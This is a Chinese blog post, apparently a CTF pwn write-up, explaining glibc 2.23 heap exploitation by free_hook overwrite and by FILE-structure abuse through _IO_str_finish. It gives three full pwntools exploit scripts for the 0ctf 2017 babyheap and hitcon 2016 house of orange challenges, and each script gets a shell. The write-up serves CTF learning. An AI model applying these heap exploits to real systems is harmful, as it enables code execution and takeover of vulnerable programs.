IO_file attack(_IO_str_finish)以及 free_hook用法

最新推荐文章于 2024-04-09 09:44:02 发布
最新推荐文章于 2024-04-09 09:44:02 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/107800020
版权
CTF 同时被 2 个专栏收录
27 篇文章 3 订阅
订阅专栏
PWN
24 篇文章 1 订阅
订阅专栏

题目是0ctf_2017_babyheap
漏洞是堆溢出

free_hook

参考链接:

https://xz.aliyun.com/t/7020
https://bbs.pediy.com/thread-230028.htm
https://bbs.pediy.com/thread-246786.htm

free_hook在libc2.23中用起来比较费劲,2.27中用的比较多
free_hook可以在og用不了的时候来system(binsh),但我为什么不realloc_hook呢?
因为free_hook上面没有值,fastbin无法直接攻击,所以利用top chunk来创建一个size
在这里插入图片描述
我们要做的就是修改top chunk到free_hook-0xb58,那里有一个数据可以用来做topchunk的size
topchunk改到那里之后,不断分配chunk来写到free_hook
利用的时候要注意修改main_arena+88(topchunk)的时候要注意chunk申请大小,不要把unsortedbin和smallbin改了,不然后续会申请不了chunk

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './0ctf_2017_babyheap'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
 
 
select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('', )
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

def menu(choice):
    sla('Command: ', str(choice))
def add(size):
    menu(1)
    sla('Size: ',str(size))
def edit(index, size, content):
    menu(2)
    sla('Index: ', str(index))
    sla('Size: ', str(size))
    sla('Content: ', content)
def free(index):
    menu(3)
    sla('Index: ', str(index))
def show(index):
    menu(4)
    sla('Index: ', str(index))

for i in range(4):
    add(0x68)
p = 'a'*0x60 + p64(0) + p64(0xe1)
edit(0, len(p), p)
free(1)
add(0x68)
show(2)
libc_base = uu64(ru('\x7f')[-6:]) - 88 - 0x10 - libc.sym['__malloc_hook']
info('libc_base', libc_base)
free_hook = libc_base + libc.sym['__free_hook']
o_g = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
og = libc_base + o_g[1]
malloc_hook = libc_base + libc.sym['__malloc_hook']
info('free_hook', free_hook)
info('og', og)
#--------------------------------------------------------------------------------------------------------
add(0x68)#4
free(2)
p = 'a'*0x60 + p64(0) + p64(0x71) + p64(malloc_hook-0x23)
#为了能在malloc_hook那里申请chunk
edit(1, len(p), p)
add(0x68)
add(0x68)#5
p = p8(2)*3+p64(3)*2+p64(0)*4+p64(0)+p64(0x50)+p64(malloc_hook+0x20)
#修改某一个main_arena里的fastbin的指向,指向main_arena+16,然后分配bin里大小的chunk来在main_arena+16那里申请一个chunk
edit(5, len(p), p)
add(0x48)#6
p = p64(0)*7+p64(free_hook-0xb58)
#然后修改申请的chunk改掉main_arena+88(topchunk的指针)
edit(6, len(p), p)

for i in range(6):
    add(0x200)
p = '\x00'*0xf8+p64(og)
edit(12, len(p), p)
#debug()
#sl('1')
r.interactive()

IO_file

利用就用2.27的利用方式,后面的方式可以向前兼容
具体的还是看这个

https://bbs.pediy.com/thread-246786.htm
https://www.bookstack.cn/read/CTF-All-In-One/doc-4.13_io_file.md#_IO_str_jumps

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './0ctf_2017_babyheap'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
 
 
select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('', )
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
         p32(0) + \
         p64(_IO_read_ptr) + \
         p64(_IO_read_end) + \
         p64(_IO_read_base) + \
         p64(_IO_write_base) + \
         p64(_IO_write_ptr) + \
         p64(_IO_write_end) + \
         p64(_IO_buf_base) + \
         p64(_IO_buf_end) + \
         p64(_IO_save_base) + \
         p64(_IO_backup_base) + \
         p64(_IO_save_end) + \
         p64(_IO_marker) + \
         p64(_IO_chain) + \
         p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct
def menu(choice):
    sla('Command: ', str(choice))
def add(size):
    menu(1)
    sla('Size: ',str(size))
def edit(index, size, content):
    menu(2)
    sla('Index: ', str(index))
    sla('Size: ', str(size))
    sla('Content: ', content)
def free(index):
    menu(3)
    sla('Index: ', str(index))
def show(index):
    menu(4)
    sla('Index: ', str(index))

for i in range(6):
    add(0x90)
add(0x60)
add(0x60)
free(6)
p1 = 'a'*0x90+p64(0)+p64(0x141)
edit(2, len(p1), p1)
free(3)
add(0x90)

show(4)
libc_base = uu64(ru('\x7f')[-6:]) - libc.sym['__malloc_hook'] - 88 - 0x10
info('libc_base', libc_base)
IO_list_all = libc_base + libc.sym['_IO_list_all']
jump_table = libc_base + libc.sym['_IO_file_jumps'] + 0xc0
system = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh').next()
info('IO_list_all', IO_list_all)
info('jump_table', jump_table)
#--------------------------------------------------------------------------------------------------------

fake_file   = pack_file(_flags=0,
                        _IO_read_ptr=0x61,
                        _IO_read_base=IO_list_all-0x10,
                        _IO_write_base=0,
                        _IO_write_ptr=1,
                        _IO_buf_base=binsh,
                        _mode=0,
                        )
fake_file += p64(jump_table-0x8)+p64(0)+p64(system)
'''
fake_file=p64(0)+p64(0x61) #fp ; to smallbin 0x60 (_chain)
fake_file+=p64(libc_base)+p64(IO_list_all-0x10) #unsortedbin attack
fake_file+=p64(0)+p64(1) #_IO_write_base ; _IO_write_ptr
fake_file+=p64(0)+p64(binsh)#_IO_buf_base=sh_addr
fake_file=fake_file.ljust(0xd8,'\x00') #mode<=0
fake_file+=p64(jump_table-8)#vtable=_IO_str_jump-8
fake_file+=p64(0)
fake_file+=p64(system)#fp+0xe8=sys_addr
'''
p = 'a'*0x90+fake_file
add(0x90)
free(6)
edit(3, len(p), p)
debug()
add(20)
r.interactive()

再贴一个house of orange的exp,用的2.27的方法做的
unsorted bin attack 改bk指针,然后触发错误调用_IO_str_finish

malloc_printerr -> __libc_message -> __GI_abort -> _IO_flush_all_lockp -> __GI__IO_str_overflow

因为我们改了,所以不会调用_IO_str_overflow,而是_IO_str_finish

from pwn import *
from LibcSearcher import * 

local_file  = './houseoforange_hitcon_2016'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
 
 
select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('', )
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
         p32(0) + \
         p64(_IO_read_ptr) + \
         p64(_IO_read_end) + \
         p64(_IO_read_base) + \
         p64(_IO_write_base) + \
         p64(_IO_write_ptr) + \
         p64(_IO_write_end) + \
         p64(_IO_buf_base) + \
         p64(_IO_buf_end) + \
         p64(_IO_save_base) + \
         p64(_IO_backup_base) + \
         p64(_IO_save_end) + \
         p64(_IO_marker) + \
         p64(_IO_chain) + \
         p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct

def menu(choice):
    sea('Your choice : ', str(choice))
def add(size, content):
    menu(1)
    sea('name :', str(size))
    sea('Name :', content)
    sea('Orange:', str(10))
    sea('Orange:', str(1))
def show():
    menu(2)
def edit(size, content):
    menu(3)
    sea('name :', str(size))
    sea('Name:', content)
    sea('Orange: ', str(10))
    sea('Orange: ', str(1))

add(0x20, 'aaaa')

p = 'a'*0x20+p64(0)+p64(0x21)+p64(0)*2+p64(0)+p64(0xf91)
edit(len(p), p)
add(0x1000, 'a')
add(0x400, 'a')
show()
libc_base = uu64(ru('\x7f')[-6:]) - 1601 - libc.sym['__malloc_hook'] - 0x10
info('libc_base', libc_base)
IO_list_all = libc_base + libc.sym['_IO_list_all']
jump_table = libc_base + libc.sym['_IO_file_jumps'] + 0xc0
info('IO_list_all', IO_list_all)
info('jump_table', jump_table)
system = libc_base + libc.symbols['system']
bin_sh = libc_base + libc.search("/bin/sh").next()
#--------------------------------------------------------------------------------------------------------
fake_file = pack_file(_flags=0,
                    _IO_read_ptr=0x61,
                    _IO_read_base=IO_list_all-0x10,
                    _IO_write_base=0,
                    _IO_write_ptr=1,
                    _IO_buf_base=bin_sh,
                    _mode=0,
        )
fake_file += p64(jump_table-8)+p64(0)+p64(system)
p = 'a'*0x400+p64(0)+p64(0x21)+p64(0)*2+fake_file
edit(len(p), p)
debug()
sl('1')


r.interactive()
真岛忍
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn题堆利用的一些姿势 -- free_hook
lifanxin的博客
04-16 4546
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn题堆利用的一些姿势 – malloc_hook 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
pwn题堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5088
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn题堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
__malloc_hook和__free_hook劫持原理
Grxer的博客
03-20 886
Hook即钩子,截获API调用的技术,是将执行流程劫持到你自己的代码。刚开始在Ubuntu22上做实验,一直不成功,又换了kali,还是不行,最后发现__free_hook,__malloc_hook,__realloc_hook,_after_morecore_hookg在libc-2.34的patch中被移除了,换了Ubuntu16 libc版本2.23,但是发现只是在ld链接时会找不到definition,也就是无法通过链接的环节,但是在libc库里还是有的,可能是考虑之前使用hook程序的兼容。
探索高效键盘与鼠标监听:iohook
最新发布
gitblog_00046的博客
04-09 516
探索高效键盘与鼠标监听:iohook 项目地址:https://gitcode.com/wilix-team/iohook 本文将带你深入理解开源项目iohook,这是一个跨平台、Node.js环境下的键盘和鼠标事件监听库。无论你是开发者还是对计算机行为监控有兴趣的用户,iohook都是一个值得了解和使用的工具。 项目简介 iohook是一个轻量级的库,它允许你在Node.js环境中捕捉操作系统级...
glibc-2.23-free
azraelxuemo的博客
05-17 626
文章目录测试代码 测试代码 和上节保持一样 #include<malloc.h> int main(){ void *p=malloc(0x18); free(p); p=NULL; }
glibc中free函数详解
huzai9527的博客
05-27 891
__libc_free详解(tcache 略) 1. 检查是否存在 hook函数,如果有就执行 void __libc_free (void *mem) { mstate ar_ptr; mchunkptr p; /* chunk corresponding to mem */ /* 1. 关于__free_hook,释放时会检查其会否为NULL,否的话就执行相应的函数 2. __free_hook指向的函数,其调用的参数,为chunk中的内容
hook.rar_api hook_hook_hook api
07-14
hook api的东西,可以实现api hook
apihook.rar_APIHOOK_api hook_hook api
09-14
APIhook,可以利用API函数进行MESSAGEBOX的拦截
HOOKAPI.rar_api hook_hook api_hookapi
09-24
hook api配套mfc代码,仅供参考
DxHookDll.rar_D3D HOOK_dxhook_dx开发_hook directx
07-15
自己写的一个小工具,支持hook directx的API
API-Hook.zip_api hook_hook_hook api_钩子
09-24
API Hook基本原理和实现,钩子的特性
文件IO-HOOK_inlinehook_
10-03
inlineHook 的模板,可以更加快速调用,如果不能正常解压,请将后缀修改为zip
内存泄漏检测组件 -- hook
kakaka666的博客
02-15 1997
2、__builtin_return_address(0)的含义是,得到当前函数返回地址,即此函数被别的函数调用,然后此函数执行完毕后,返回,所谓返回地址就是那时候的地址。3、__builtin_return_address(1)的含义是,得到当前函数的调用者的返回地址。注意是调用者的返回地址,而不是函数起始地址。printf函数底层会调用malloc函数,如果程序陷入死循环,会不停的调用malloc。好像只支持参数为0。让第一次进入函数的部分执行我们的流程,而递归进去的算第二次进入函数,返回即可。
一道题目入门VMpwn
qq_40712959的博客
04-16 322
一道题目学习VMpwn 原理 VMpwn 程序通常都是模拟一套虚拟机,对用户输入的opcode进行解析,模拟程序的执行,故VMpwn常见设计如下: 初始化分配模拟寄存器空间(reg) 初始化分配模拟栈空间(stack) 初始化分配模拟数据存储空间(data) 初始化分配模拟机器指令(opcode)空间(text) [OGeek2019 Final]OVM 程序采用32bit定长指令,每个操作码、操作数均为8bit,其格式为: | opcode | dst | op1 | op2 | 程序具体指令参考
津门杯2021CTF pwn解
qq_39948058的博客
08-26 467
前言:这个题一开始调通了,但是不知道正确的libc版本,远程没有打通,最后听了一下libc版本是11.4的libc2.23版本,才打通,题很多洞,比较经典的是edit的READ容易写。写到freehook为onegadget即可,tcl,只解了一道题,时间原因第二道pwn题也没看,噗。。 漏洞点: 漏洞点这两个地方,他们都是在bss段里,而且位置比较临近可以直接考虑一下任意写,当时没太注意这个点,直接doublefree的,发现只给了4个chunk,所以没能构建出,又审计了一下edit R.
Linux下C++中可使用的3种Hook方法
网络资源是无限的
12-05 6475
Hook即钩子,截获API调用的技术,是将执行流程重定向到你自己的代码,类似于hack。如使程序运行时调用你自己实现的malloc函数代替调用系统库中的malloc函数。这里介绍下Linux下C++中可使用的3中Hook方法: 1. GNU C库允许你通过指定适当的钩子函数(hook function)来修改malloc、realloc和free的行为,钩子函数的声明在malloc.h文件中,如__malloc_hook, __free_hook,你可以使用这些钩子来帮助你调试使用...
内存分配钩子__malloc_hook, __reallac_hook, __free_hook的使用
鬼手
08-26 4821
mem.h #ifndef __MEM_H__ #define __MEM_H__ #include #include static void *(*old_malloc_hook)(size_t, const void*); static void *(*old_realloc_hook)(void *ptr, size_t size, const void *caller); sta
堆漏洞挖掘:21---_lib_free函数源码详解
董哥的黑板报
08-10 1158
一、_lib_free函数简介 在应用层调用free函数,在glibc中其实调用的就是_lib_free函数 与_lib_malloc函数一样,_lib_free函数会调用_int_free函数,_int_free函数此时释放堆内存的核心函数 函数的主要内容包括: ①检查是否有__free_hook ②如果堆块为NULL,则什么都不做 ③如果是mmap的堆块,调用munmap进行释...
hook方法整理
neilooo的博客
11-03 2852
hook基础库函数可以实现多种功能,比如: 1.malloc/free,内存监控; 2.pthread_create,线程泄漏; 3.open/close,fd泄漏; 有助于程序的稳定性检测。 本文记录hook方法和原理,持续补充 glic malloc hook,plt hook(xhook
nf_register_net_hook和nf_register_hook的区别
05-05
`nf_register_net_hook` 和 `nf_register_hook` 都是Linux内核中用于注册netfilter钩子函数的函数,但是它们的作用范围不同。 `nf_register_net_hook` 用于注册网络命名空间中的netfilter钩子函数,而 `nf_register_hook` 用于注册全局的netfilter钩子函数。 在Linux内核中,一个系统可以包含多个网络命名空间,每个网络命名空间都有自己的netfilter钩子函数。因此,如果你需要在指定的网络命名空间中注册netfilter钩子函数,你应该使用 `nf_register_net_hook` 函数。 而如果你需要在全局范围内注册netfilter钩子函数,你可以使用 `nf_register_hook` 函数。但是需要注意的是,使用 `nf_register_hook` 函数注册的钩子函数会在所有网络命名空间中生效,因此可能会对系统的性能产生影响。 因此,如果你想要注册netfilter钩子函数,应该根据具体情况选择合适的函数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值